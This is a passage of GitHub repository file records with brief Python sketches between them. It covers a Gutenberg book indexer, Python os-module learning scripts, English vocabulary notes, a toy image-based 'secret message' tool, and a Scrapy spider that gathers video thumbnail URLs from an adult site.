Gilbert\"},\n \"utrkj10.txt\":{\"title\":\"Unbeaten Tracks in Japan\",\"author\":\"Bird\"},\n \"vpasm10.txt\":{\"title\":\"Vailima Prayers & Sabbath Morn\",\"author\":\"Robert Louis Stevenson\"},\n \"wldsp10.txt\":{\"title\":\"Shorter Prose Pieces\",\"author\":\"Oscar Wilde\"},\n \"zncli10.txt\":{\"title\":\"The Zincali\",\"author\":\"George Borrow\"}}\n\n for current_doc_id, current_file in enumerate(os.listdir(dir_to_process)):\n\n # Skip Hidden Files\n if current_file[0] == \".\":\n continue\n\n if current_file in info:\n data = info[current_file]\n title = data[\"title\"]\n author = data[\"author\"]\n else:\n title, author = extract_title_author(\n os.path.join(dir_to_process, current_file))\n\n doc = {\n 'author': author.lower(),\n 'title': title.lower(),\n 'bookname':current_file,\n 'text': codecs.open(os.path.join(dir_to_process, current_file), \"r\",encoding='utf-8', errors='ignore').read(),\n 'timestamp': datetime.now(),\n 'cluster':ebook_cluster[current_file]\n }\n\n rec = \"%s\\n\" % author\n file_to_save.write(rec)\n\n try:\n res = es.index(index=\"top100\", doc_type='ebook', id=current_doc_id, body=doc)\n print res['created'],current_file\n\n\n except:\n print \"Cannot index:%s\" % current_file\n"
},
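A minimal Python 3 sketch of the header-parsing idea used in the indexer above: Project Gutenberg files carry `Title:` and `Author:` lines near the top, so a capture group pulls the value out directly instead of matching the whole line and stripping the prefix afterwards. The sample string is illustrative.

```python
import re

def extract_title_author(text):
    # Gutenberg headers sit at the top; searching a slice keeps this cheap.
    head = text[:4000]
    title = re.search(r"Title:\s*(.+)", head)
    author = re.search(r"Author:\s*(.+)", head)
    return (title.group(1).strip() if title else "",
            author.group(1).strip() if author else "")

sample = "Title: The Tale of Balen\nAuthor: Algernon Charles Swinburne\n"
print(extract_title_author(sample))
# -> ('The Tale of Balen', 'Algernon Charles Swinburne')
```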
{
"alpha_fraction": 0.603073000907898,
"alphanum_fraction": 0.606914222240448,
"avg_line_length": 27.925926208496094,
"blob_id": "26d18ee6cf592c87701ed8fd6a55a5fb210eb685",
"content_id": "90e1f357d5ca357916ee2fb007cce1497d3a5584",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1562,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 54,
"path": "/extract_books.py",
"repo_name": "Aishwarya20/be-project-search-engine",
"src_encoding": "UTF-8",
"text": "# extract names of books and corresponding authors.\n#author variable holds all the information regarding book titles and author\nimport re\nimport string\nimport os\nimport codecs\nimport json\nimport sys\n\n\ndef get_files(raw_path):\n files_extracted=[]\n root_extracted=[]\n print (\"Files in: \" +raw_path)\n root_extracted.append(raw_path)\n for current_doc_id, current_file in enumerate(os.listdir(raw_path)):\n files_extracted.append(current_file)\n return files_extracted,root_extracted\n\n\n\ndef main(args):\n dir_to_process=args\n files,roots=get_files(dir_to_process)\n info=[]\n books=[]\n string_content=''\n\n for root in roots:\n for filename in files:\n with codecs.open(root+'\\\\'+filename, \"r\",encoding='utf-8', errors='ignore') as file_name:\n text=file_name.readline()\n string_content +='\\n'+file_name.read()\n info.append(text.lower())\n book_info=''\n\n non_useful=['project',\"gutenberg's\",'ebooks','etexts','etext','ebook','gutenberg','this','presented','file','s']\n result=[word for word in re.findall('[a-z0-9]+',text.lower()) if word not in non_useful]\n\n book_info=' '.join(result)\n book_info=re.sub(\"of\",\"\",book_info,count=1).strip()\n books.append(book_info)\n\n #print books\n #print book_info\n author='\\n'.join(books)\n return author,string_content\n\n\n\n\nauthor,content=main(sys.argv[1])\nif __name__=='__main__':\n author,content=main(sys.argv[1])\n"
}
] | 6 |
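The title-cleaning step in `extract_books.py` above boils down to tokenizing the first line and filtering against a stop list; a self-contained sketch below, with the stop list copied from the script. Note that `re.sub("of", "", ..., count=1)` also matches `of` inside a longer word and removes only the first occurrence, which is one reason extracted titles can come out mangled.

```python
import re

NON_USEFUL = {'project', "gutenberg's", 'ebooks', 'etexts', 'etext',
              'ebook', 'gutenberg', 'this', 'presented', 'file', 's'}

def clean_title(first_line):
    words = [w for w in re.findall(r'[a-z0-9]+', first_line.lower())
             if w not in NON_USEFUL]
    return re.sub('of', '', ' '.join(words), count=1).strip()

print(clean_title("The Project Gutenberg EBook of The Tale of Balen"))
# -> 'the  the tale of balen'  (only the first 'of' is removed)
```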
pesix2500/learning
|
https://github.com/pesix2500/learning
|
e860b5802674c6f7bd729e4e964fe69a2ee1b57b
|
629b2b98ec53df06ced529a11e57d10f6211e2b3
|
92b0d2b2a0dd86a1079a9ee0988538690cdc6f6e
|
refs/heads/master
| 2018-02-07T08:01:42.149345 | 2017-11-02T06:05:41 | 2017-11-02T06:05:41 | 57,002,586 | 0 | 0 | null | 2016-04-25T01:15:47 | 2018-11-17T14:06:32 | 2018-11-17T14:06:31 |
Python
|
[
{
"alpha_fraction": 0.5767898559570312,
"alphanum_fraction": 0.5946882367134094,
"avg_line_length": 21.016948699951172,
"blob_id": "d7600c5cd5d1bebde77fa0908d3a75ab627066c7",
"content_id": "2997366fc4f1e09e6adea61789ad156a365ef6d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6040,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 236,
"path": "/cookpython/cook.py",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport string\nimport time\n\nimport argparse\n\n\ndef func1():\n \"\"\"\n 用%(var)s 和 vars()来获取当前局部名称空间的可见元素\n \"\"\"\n book = 'libray'\n pages = 32\n scripts = 250\n print('the %(book)s has more than %(pages)s pages and %(scripts)s scripts' % vars())\n\n\n\ndef func2():\n #在函数内部定义类也是可以的啊\n class F2Class:\n pass\n \"\"\"\n 用type或者isinstance来获取当前对象的类型\n \"\"\"\n print(isinstance('string', str))\n print(type('string') == str)\n print(isinstance(100, int))\n print(type(100) == int)\n print(isinstance(7.89, float))\n\n obj = F2Class()\n print(type(obj) == F2Class)\n print(isinstance(obj, F2Class))\n\n\ndef func3():\n \"\"\"\n eval将一个字符串作为函数表达式进行求值\n \"\"\"\n expressions = [\"1\",\n \"1+1\",\n \"len('world')\",\n \"'string'\"\n ]\n for e in expressions:\n print(eval(e))\n\n\ndef func4():\n '''\n eval 函数只针对简单的表达式. 如果要处理大块的代码, 可以使用 compile 和 exec 函数\n compile(source, filename, mode)\n source:字符串\n filename:代码文件名称,如果不是从文件读取代码则随便传递一些可辨认的值。\n model:指定编译代码的种类。可以指定为 ‘exec’,’eval’,’single’。\n '''\n str = \"for i in range(0,10): print(i)\" \n c = compile(str,'<code>','exec') # 编译为字节代码对象 \n exec(c) \n\n # 直接执行也无压力啊\n exec(str) \n\n #python3 移除了execfile函数,可以通过下边方式执行外部py文件\n with open('test.py','r') as fd:\n exec(fd.read())\n\n\n\ndef func5():\n #listdir 获取指定文件夹下的文件列表\n for file in os.listdir(os.getcwd()):\n print(file)\n\n #获取当前目录\n cwd = os.getcwd()\n print('current dir is %s'%cwd)\n\n #跳转目录\n os.chdir(os.pardir)\n print('current dir is %s'%os.getcwd())\n\n\n\ndef func6():\n #os.makedirs() 可以创建多层目录\n os.makedirs('test1/test2/test3/test4/test5')\n fp = open('test1/test2/test3/test4/test5/file.txt','w')\n fp.write(\"This is a string\")\n fp.close()\n\n #os.remove() 删除文件\n os.remove('test1/test2/test3/test4/test5/file.txt')\n #os.removedirs() 多级删除文件夹,从test5开始,如果成功就上一层\n #直到指定的最上一层\n os.removedirs('test1/test2/test3/test4/test5')\n\n #mkdir和rmdir只能针对单层目录\n os.mkdir('folder')\n os.rmdir('folder')\n\n\ndef func7():\n\n #os.remove()删除指定文件\n print('create a newfile.txt...')\n fp = open('newfile.txt','w')\n fp.write(\"This is a string\")\n fp.close()\n for file in os.listdir(os.getcwd()):\n print(file)\n\n print('remove a newfile.txt...')\n os.remove('newfile.txt')\n for file in os.listdir(os.getcwd()):\n print(file)\n\n #用os.rename()改文件名\n txt = 'test.txt'\n txtnew = 'textnew.txt'\n print('rename test to testnew.txt')\n os.rename(txt,txtnew)\n for file in os.listdir(os.getcwd()):\n print(file)\n print('rename testnew.txt to test.txt')\n os.rename(txtnew,txt)\n for file in os.listdir(os.getcwd()):\n print(file)\n\n\ndef func8():\n '''\n os.stat()获取文件的各种属性\n '''\n file = 'test.txt'\n st = os.stat(file)\n print(st)\n\n mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime = st\n print(\"size is :\", size)\n print(\"created at :\", time.ctime(ctime))\n print(\"last accessed: \", time.ctime(atime))\n print(\"last modified:\", time.ctime(mtime))\n\ndef func9():\n #os.name 获取当前操作系统的类型\n #os.system执行外部命令\n print(os.name)\n if os.name == 'nt':\n command = 'dir'\n else:\n command = 'ls -l'\n os.system(command)\n\ndef func10():\n #使用os.path进行路径处理\n filename = 'my/little/pony.exe'\n print(os.path.split(filename)) #只分割出最后一项和前边两大部分\n print(os.path.splitext(filename)) #用于分割扩展名\n print(os.path.dirname(filename))\n print(os.path.basename(filename))\n print(os.path.join(os.getcwd(),os.path.dirname(filename),os.path.basename(filename)))\n\n print(os.path.exists('test.txt'))\n print(os.path.isabs('my/little/pony')) #判断是否是绝对路径\n 
print(os.path.isabs('/root/user/bin'))\n print(os.path.isdir('my'))\n os.mkdir('my')\n print(os.path.isdir('my'))\n os.rmdir('my')\n\n #os.path.expandvars 可以把路径字符串中的环境变量扩展开来\n os.environ['USER_TEST'] = 'charlie'\n print(os.path.expandvars('/home/$USER_TEST/config'))\n\n\ndef func11():\n #使用os.walk遍历文件系统\n path = r'C:\\Windows\\Web'\n #分别是当前扫描的路径,该路径下的子文件夹列表,该路径下的文件列表\n for root , dirs, files in os.walk(path):\n print(root,dirs,files)\n\n #对比listdir,listdir只是扫描当前路径\n for file in os.listdir(path):\n print(file)\n\n #通过只看files,可以遍历到所有的实体文件\n for (root,dirs,files) in os.walk(path):\n for file in files:\n fullname = os.path.join(root,file)\n print(fullname)\n\n\n\ndef func12():\n text = \"Hello my beatifual world, I am Trump\"\n print(text.upper())\n print(text.lower())\n print(text.split())\n print('-'.join(text.split()))\n print(text.replace('Trump','Clinton'))\n\n print(int('100'))\n print(int('100',8))\n print(int('100',16))\n print(float('3.1416926'))\n\n\n\n\n\n\n \n\n\n\n\n\n# cook main function\ndef cook_main(argv):\n parser = argparse.ArgumentParser(usage='%(prog)s no (e.g. 1,2,3..)')\n parser.add_argument('no', type=int, choices=range(1, 1000), help='cook number (1,2,3..)')\n args = parser.parse_args()\n\n function = 'func' + str(args.no)\n eval(function)()\n\n\nif __name__ == '__main__':\n sys.exit(cook_main(sys.argv))\n"
},
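A compact companion to `func3`/`func4` above: `eval` is restricted to single expressions, while `compile` + `exec` handles statement blocks, and `exec(open(path).read())` is the Python 3 stand-in for the removed `execfile`. Self-contained sketch:

```python
source = "for i in range(3):\n    print(i)"

print(eval("len('world')"))                   # expressions only -> 5

code_obj = compile(source, "<demo>", "exec")  # bytecode object
exec(code_obj)                                # prints 0, 1, 2

# exec(source) works directly as well; compiling first pays off
# when the same block is executed repeatedly.
```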
{
"alpha_fraction": 0.7009108066558838,
"alphanum_fraction": 0.7070536017417908,
"avg_line_length": 37.64754104614258,
"blob_id": "0f485b85c2364f2d6f18757a8f27f025458764d4",
"content_id": "d4f8adc1d802dfab8114b615528d348c1df6bfc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4721,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 122,
"path": "/english/words.rst",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "\n****************************************************\nEnglish New Words\n****************************************************\n\n\n\n2016-7-29 \n============\n* breed\n\n - If you breed animals or plants, you keep them for the purpose of producing more animals or plants with paticular qualities, in a controlled way.\n - Agile itself is just a newer, best-of-breed collection of methodologies used to develop and maintain software.\n\n* complicate\n\n - To **complicate** something means to make it more difficult to understand or deal with.\n - As the amount of code grew and became more and more complicated, this method was obviously too risky and expensive an approach to software development.\n\n* despite\n\n - You use despite to introduce a fact which makes the other part of the sentence surprising.\n - Despite the bad weather and ill health, he took first place in the foot rece.\n - Despite wide adoption and continued use, however, waterfall model has some problems.\n\n* squeeze\n\n - If you squeeze something, you press it firmly, usually with your hands\n - if you squeeze a liquid or a soft substance out of an object, you get the liquid or substance out by pressing the object.\n - He said government cuts coupled with a squeeze on bank credit had suppressed growth.\n\n* creep\n\n - If somthing creeps somewhere, it moves very slowly.\n - There software changes in scope add up -- an effect known as scope creep.\n\n* respective\n\n - **Respective** means relating or belonging separately to the individual people you have just mentioned.\n - Steve and I were at very different stages in our respective careers.\n - Competent authorities of various trades shall be in charge of the product quality control in their respective systems.\n\n* \n* \n* \n\n\n2016-07-27 \n=================\n\n* violate\n\n - For cloud project, there are two very important rules which can not be violated.\n - If someone **violates** an agreement, law, or promise, they break it.\n - They went to prison because they viloated the law.\n* claim\n\n - If you say that someone **claims that** something is true, you mean they say that is true but you are not sure whether or not they are telling the truth.\n - He claimed that it was all conspiracy against him.\n - He claims a 70 to 80 percent success rate.\n\n* clarify\n\n - To **clarify** something means to make it easier to understand, usually by explaining it in more detail.\n - A bank spokesman was unable to clarify the situation.\n - If there are some uncertainty for the supporting scenarios, we need to study and clarify them.\n\n* boundary\n\n - The boundary of an area of land is an imaginary line that seprates it from other areas.\n\n* potential\n\n - You use potential to say that someone or something is capable of developing into the particular kind of person or thing mentioned.\n - The firm has identified 60 potential customers at home and abroad.\n - Please continue to check scan report and fix potential issues.\n\n* legacy\n\n - A legacy is money or property which someone leaves to you when they die.\n - For legacy program, you should do code review.\n\n* migration\n\n - If people migrate, the move from one place to another, especially in order to find work or to live somewhere for a short time.\n - The fact of changing from one computer system to another.\n - The wizard will prompt you to save a backup copy of your project before migration.\n\n* nominate\n\n - If someone is nominated for a job or position, their name is formally suggested as a candidate for 
it.\n - If someone or somthin such as an actor or a film **is nominated** for an award, someone formally suggests that they should be given that award.\n - Practically every movie he made was nominated for an Oscar.\n\n + Practically means almost, but not completely or exactly.\n\n* retrospective\n\n - A **retrospective** is an exhibition or showing of work done by an artist over many years, rather than his or her most recent work.\n - Retrospective meeting \n\n* swimlane\n\n - A swimlane is a process role, which is usally assigned to a group of users.\n\n* diverse\n\n - if a group or range of things is **diverse**, it is made up of a wide variety of things.\n - He said he has never seen so many diverse views gathered together to **tackle** the problem.\n\n + If you **tackle** a diffcult problem or task, you deal with it in a very determined or efficient way\n + The first reason to tackle these problems is to save children's lives.\n\n\n\n2016-06-01 \n=============\n* inspire\n\n - If someone or something inspires you to do something new or unusual, they make you want to do it.\n - Leadership means that the person\n* \n* \n\n\n\n\n"
},
{
"alpha_fraction": 0.6231883764266968,
"alphanum_fraction": 0.6521739363670349,
"avg_line_length": 22,
"blob_id": "cd448ab05894e539649ff4fe0b37a6b73d2d584a",
"content_id": "4f674bb6360252cc183b69a9cd1a1fd76c42e38e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 3,
"path": "/cookpython/test.py",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "print(\"This is a test python file\")\nfor i in range(10):\n print(i)\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 16.5,
"blob_id": "73e7cdfa564f654b1ab0331adc31734b8b410b2b",
"content_id": "4a58d83b6a40aecdbdc54d24d3526b624daff48b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 2,
"path": "/README.md",
"repo_name": "pesix2500/learning",
"src_encoding": "UTF-8",
"text": "# learning\nlearning site for pesix\n"
}
] | 4 |
Akshith-Ranjan/Secret-Message-Creator
|
https://github.com/Akshith-Ranjan/Secret-Message-Creator
|
3f3410cf1ffd0c7a153634383c791efce299d18c
|
32dea5389f5db5fe05f353c635db1bdebf760f9d
|
fb685340b85258b7da6c95851e57cdf2b73d04fb
|
refs/heads/master
| 2021-08-22T08:31:20.586885 | 2017-11-29T18:46:27 | 2017-11-29T18:46:27 | 112,511,910 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6765754818916321,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 29.035715103149414,
"blob_id": "cfb3ee94193fc751c4d32714eac3c32d62a3e4f1",
"content_id": "023e8eda4aa7c69f3488570658f479dcbdf6d536",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 28,
"path": "/decrypt.py",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport os\nimport shutil\nimport sys\n\nif os.path.isdir(r\"./decryptedMsg/\"):\n print \"Deleting existing encryptedMsg directory\"\n shutil.rmtree(r\"./decryptedMsg/\")\nprint \"Creating new directory named decryptedMsg\"\nos.mkdir(r\"./decryptedMsg/\")\n\nif os.path.isdir(r\"./encryptedMsg/\"):\n filenames = os.listdir(r\"./encryptedMsg/\")\n if len(filenames) < 1:\n print \"'encryptedMsg' directory is empty. Run encrypt.py to create an encrypted message\"\n print \"Exiting...\"\n sys.exit()\nelse:\n print \"'encryptedMsg' directory does not exist. Run encrypt.py to create a message\"\n print \"Exiting...\"\n sys.exit()\n\nfor filename in filenames:\n src = r\"./encryptedMsg/\"+filename\n dst = r\"./decryptedMsg/\" + filename.translate(None,\"0123456789\")\n shutil.copy(src, dst)\nprint \"Completed decrypting\"\n"
},
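The decryption above leans on Python 2's `str.translate(None, "0123456789")` to delete the digit prefix. For reference, an equivalent Python 3 sketch uses `str.maketrans` with a deletion set; the filename is illustrative.

```python
strip_digits = str.maketrans('', '', '0123456789')

print("17athens.jpg".translate(strip_digits))  # -> 'athens.jpg'
```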
{
"alpha_fraction": 0.498934805393219,
"alphanum_fraction": 0.5279079675674438,
"avg_line_length": 19.059829711914062,
"blob_id": "7486cd52363e3cf4e9137455d2d115a28eb2a11a",
"content_id": "6e5993dc3e469dac47d7f25a9219a857293d25c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2347,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 117,
"path": "/creator.py",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport os\nimport shutil\nimport sys\n\nmapping = {\n 'a': 0,\n 'b': 1,\n 'c': 2,\n 'd': 3,\n 'e': 4,\n 'f': 5,\n 'g': 6,\n 'h': 7,\n 'i': 8,\n 'j': 9,\n 'k': 10,\n 'l': 11,\n 'm': 12,\n 'n': 13,\n 'o': 14,\n 'p': 15,\n 'q': 16,\n 'r': 17,\n 's': 18,\n 't': 19,\n 'u': 20,\n 'v': 21,\n 'w': 22,\n 'x': 23,\n 'y': 24,\n 'z': 25,\n '.': 26,\n ' ': 27\n}\na = [\n 'athens.jpg',\n 'austin.jpg',\n 'bangalore.jpg',\n 'barcelona.jpg',\n 'beijing.jpg',\n 'berkeley.jpg',\n 'bogota.jpg',\n 'bristol.jpg',\n 'bucharest.jpg',\n 'buenos aires.jpg',\n 'cairo.jpg',\n 'chennai.jpg',\n 'chicago.jpg',\n 'colombo.jpg',\n 'dallas.jpg',\n 'delhi.jpg',\n 'edinbrugh.jpg',\n 'gainesville.jpg',\n 'houston.jpg',\n 'hyderabad.jpg',\n 'istanbul.jpg',\n 'ithaca.jpg',\n 'jacksonville.jpg',\n 'karachi.jpg',\n 'kiev.jpg',\n 'london.jpg',\n 'los angeles.jpg',\n 'madrid.jpg',\n 'manchester.jpg',\n 'miami.jpg',\n 'new york.jpg',\n 'oakland.jpg',\n 'pune.jpg',\n 'rochester.jpg',\n 'san diego.jpg',\n 'san jose.jpg',\n 'sao paulo.jpg',\n 'seattle.jpg',\n 'seoul.jpg',\n 'shanghai.jpg',\n 'singapore.jpg',\n 'sunnyvale.jpg',\n 'sydney.jpg',\n 'tel aviv.jpg',\n 'zimbabwe.jpg'\n]\n\n\nif os.path.isdir(r\"./alphabet\"):\n alpha_files = os.listdir(r\"./alphabet/\")\n if len(alpha_files) != 28:\n print \"All alphabet images dosent exist( 26 letters, '.' and ' ' )\"\n print \"exiting...\"\n sys.exit()\nelse:\n print \"Directory with all alphabet images dosent exist\"\n print \"exiting...\"\n sys.exit()\n\nif os.path.isdir(r\"./newMessage/\"):\n print \"Deleting existing 'newMessage' directory\"\n shutil.rmtree(r\"./newMessage/\")\nprint \"Creating new directory named newMessage\"\nos.mkdir(r\"./newMessage/\")\n\nmsg = input(\"Enter the new message ( Use quoates )( No numbers )\" +\n \"( max 42 char )\\n\")\nmsg = msg.lower().translate(None, \"0123456789\")\nmsg = (msg[:42] + '...') if len(msg) > 42 else msg\n\nprint \"The entered message is: \" + msg\ni = 0\nprint \"Creating message...\"\nfor letter in msg:\n src = r\"./alphabet/\"+alpha_files[mapping[letter]]\n dst = r\"./newMessage/\" + a[i]\n shutil.copy(src, dst)\n i = i + 1\nprint \"Go to './newMessage/' directory to see the message\"\nprint \"Completed\"\n"
},
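The hand-written `mapping` table in `creator.py` above can be generated from `string.ascii_lowercase`, which removes the risk of a typo in one of the 28 entries. A sketch (names are illustrative):

```python
import string

ALPHABET = string.ascii_lowercase + '. '            # 26 letters, '.', ' '
MAPPING = {ch: i for i, ch in enumerate(ALPHABET)}

assert len(MAPPING) == 28
assert MAPPING['a'] == 0 and MAPPING['.'] == 26 and MAPPING[' '] == 27
```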
{
"alpha_fraction": 0.7409766316413879,
"alphanum_fraction": 0.7409766316413879,
"avg_line_length": 25.16666603088379,
"blob_id": "e21575aa30e7b80b63192432b3660a3e4789f682",
"content_id": "de955e3b8be4c9aa8ad37a4d0762a76e3efecfd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 471,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 18,
"path": "/README.md",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "# Secret-Message-Creator\nPython programs that can create a message using sequence of images, encrypt that message and decrypt the encrypted message.\n## Installation \n* [Python](https://www.python.org/downloads/)\n## Usage\n* Navigate to the program directory in a terminal\n* Run creator.py to create the message.\n```\npython creator.py\n```\n* Run encrypt.py to encrypt the message.\n```\npython encrypt.py\n```\n* Run decrypt.py to decrypt the message.\n```\npython decrpyt.py\n```\n"
},
{
"alpha_fraction": 0.6762589812278748,
"alphanum_fraction": 0.6810551285743713,
"avg_line_length": 27.758621215820312,
"blob_id": "bdb9907642b05565745c8f6bebe55cde3b651209",
"content_id": "e353639193b36cbab24c05b3f6ad17e94b878d75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 834,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 29,
"path": "/encrypt.py",
"repo_name": "Akshith-Ranjan/Secret-Message-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport os\nimport random\nimport shutil\nimport sys\n\nif os.path.isdir(r\"./encryptedMsg/\"):\n print \"Deleting existing encryptedMsg directory\"\n shutil.rmtree(r\"./encryptedMsg/\")\nprint \"Creating new directory named encryptedMsg\"\nos.mkdir(r\"./encryptedMsg/\")\n\nif os.path.isdir(r\"./newMessage/\"):\n filenames = os.listdir(r\"./newMessage/\")\n if len(filenames) < 1:\n print \"'newMessage' directory is empty. Run creator.py to create a message\"\n print \"Exiting...\"\n sys.exit()\nelse:\n print \"'newMessage' directory does not exist. Run creator.py to create a message\"\n print \"Exiting...\"\n sys.exit()\n\nfor filename in filenames:\n src = r\"./newMessage/\"+filename\n dst = r\"./encryptedMsg/\" + str(random.randint(1, 30)) + filename\n shutil.copy(src, dst)\nprint \"Completed encrypting\"\n"
}
] | 4 |
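A quick round-trip check of the scheme implemented by `encrypt.py` and `decrypt.py` above: prepending random digits and later deleting every digit recovers the original name only because the city-name filenames contain no digits, which is also why `creator.py` strips digits from the message. Illustrative sketch:

```python
import random

def encrypt_name(name):
    return str(random.randint(1, 30)) + name

def decrypt_name(name):
    return ''.join(ch for ch in name if not ch.isdigit())

for name in ['athens.jpg', 'new york.jpg']:
    assert decrypt_name(encrypt_name(name)) == name
```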
aomelo/phtncrawler
|
https://github.com/aomelo/phtncrawler
|
a0490276411d8d7ef60f8379936297509d0efdbf
|
24276210395516dd593da34aa432adb4bd8d4f6a
|
af0d77997335681aa4d6acc862d2d6a192326681
|
refs/heads/master
| 2021-01-19T04:21:39.525177 | 2016-07-14T18:35:29 | 2016-07-14T18:35:29 | 63,360,365 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5505906343460083,
"alphanum_fraction": 0.5593220591545105,
"avg_line_length": 45.369049072265625,
"blob_id": "62b1094445589d986ee96f1fe7766973e332145c",
"content_id": "c648722339a7ce679fdb777b4de308c1b89d1120",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3894,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 84,
"path": "/craigslist_sample/spiders/ph.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy import Request\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nfrom craigslist_sample.items import PhItem\nimport re\nfrom demjson import decode\nfrom math import ceil\nimport craigslist_sample.settings\nfrom craigslist_sample.settings import VIDEO_RESOLUTION\n\nclass MySpider(CrawlSpider):\n name = \"ph\"\n prefix = \"http://www.pornhub.com\"\n allowed_domains = [\"www.pornhub.com\",\n \"cdnt4b.video.pornhub.phncdn.com\",\n \"cdn1.video.pornhub.phncdn.com\",\n \"cdn2b.video.pornhub.phncdn.com\",\n \"[0-9|a-z|A-Z|.]*.rncdn3.com\",\n \".*.video.pornhub.phncdn.com\",]\n start_urls = [\"http://www.pornhub.com/video?c=41\",\n #\"http://www.pornhub.com/channels/povd/videos?o=vi\",\n #\"http://www.pornhub.com/channels/povd/videos?o=ra\"\n ]\n\n #rules = (\n # Rule(LinkExtractor(allow=(), restrict_xpaths=('//li[@class=\"page_next\"]',)), callback=\"parse\", follow=True),\n #)\n\n def generate_file_urls(self,item):\n num_urls = int(ceil(float(item[\"duration\"])/float(item[\"thumbsFrequency\"])/25.0))\n file_urls = []\n pattern = item[\"thumbnails\"]\n print pattern\n for i in range(num_urls):\n url = re.sub(\"S\\{[0-9]*\\}\", (\"S\"+str(i)), pattern)\n print url\n file_urls.append(url)\n return file_urls\n\n\n\n def parse_video(self, response):\n hxs = Selector(response)\n\n item = PhItem()\n item[\"link\"] = response.url\n item[\"viewkey\"] = re.search(\"viewkey=(.*)\", response.url).group(1)\n item[\"id\"] = hxs.xpath('//div/@data-video-id').extract()[0]\n item[\"title\"] = hxs.xpath('//title').extract()[0]\n item[\"duration\"] = hxs.xpath('//div/@data-duration').extract()[0]\n jscode = hxs.xpath('//div[@id=\"player\"]/script[@type=\"text/javascript\"]').extract()[0]\n if not jscode == []:\n #download_url = re.search(\"var player_quality_\"+settings.VIDEO_RESOLUTION+\" = '(.*)';\", jscode[0]).group(1).split(\";\")[0]\n #download_url = re.search(\"var player_quality_\"+VIDEO_RESOLUTION+\"p = '(.*)';\", jscode).group(1).split(\";\")[0]\n #if download_url and VIDEO_RESOLUTION in download_url:\n # item[\"file_urls\"] = [download_url.replace(\"'\",\"\")]\n jscode = hxs.xpath('//div[@class=\"video-wrapper\"]/div/script[@type=\"text/javascript\"]').extract()[0]\n flash_vars = re.search(\"var flashvars_[0-9]* = (\\{.*\\});\",jscode).group(1)\n jsonvars = decode(flash_vars)\n if \"actionTags\" in jsonvars:\n tags = jsonvars[\"actionTags\"]\n if tags:\n item[\"tags\"] = tags\n item[\"thumbnails\"] = jsonvars[\"thumbs\"][\"urlPattern\"]\n item[\"thumbsFrequency\"] = jsonvars[\"thumbs\"][\"samplingFrequency\"]\n height = int(jsonvars[\"thumbs\"][\"thumbHeight\"])\n width = int(jsonvars[\"thumbs\"][\"thumbWidth\"])\n if height==90 and width>=160 and item[\"thumbnails\"]:\n item[\"file_urls\"] = self.generate_file_urls(item)\n yield item\n\n def parse(self, response):\n hxs = Selector(response)\n videos = hxs.xpath('//li[@class=\"videoblock\"]/div/div/a')\n if not videos:\n videos = hxs.xpath('//div[@class=\"phimage\"]/a')\n for video in videos:\n url = response.urljoin(video.xpath(\"@href\").extract()[0])\n yield Request(url, callback=self.parse_video, method=\"GET\")\n next_page = hxs.xpath('//li[@class=\"page_next\"]/a/@href')\n if next_page:\n url = response.urljoin(next_page[0].extract())\n yield Request(url, callback=self.parse, method=\"GET\")"
},
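`generate_file_urls` above rewrites a sequence slot of the form `S{0}` inside the site's thumbnail URL pattern, one URL per 25-frame mosaic. A self-contained sketch of the same arithmetic; the URL and numbers are made up.

```python
import re
from math import ceil

def expand_pattern(pattern, duration, frequency, frames_per_image=25):
    count = int(ceil(float(duration) / frequency / frames_per_image))
    return [re.sub(r"S\{[0-9]*\}", "S%d" % i, pattern) for i in range(count)]

urls = expand_pattern("http://example.com/thumbs/S{0}.jpg",
                      duration=300, frequency=4)
print(urls)   # -> ['...S0.jpg', '...S1.jpg', '...S2.jpg']
```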
{
"alpha_fraction": 0.8037735819816589,
"alphanum_fraction": 0.8056603670120239,
"avg_line_length": 26.947368621826172,
"blob_id": "ed5d0c709baff2e29b76b912e622735a0d1aa413",
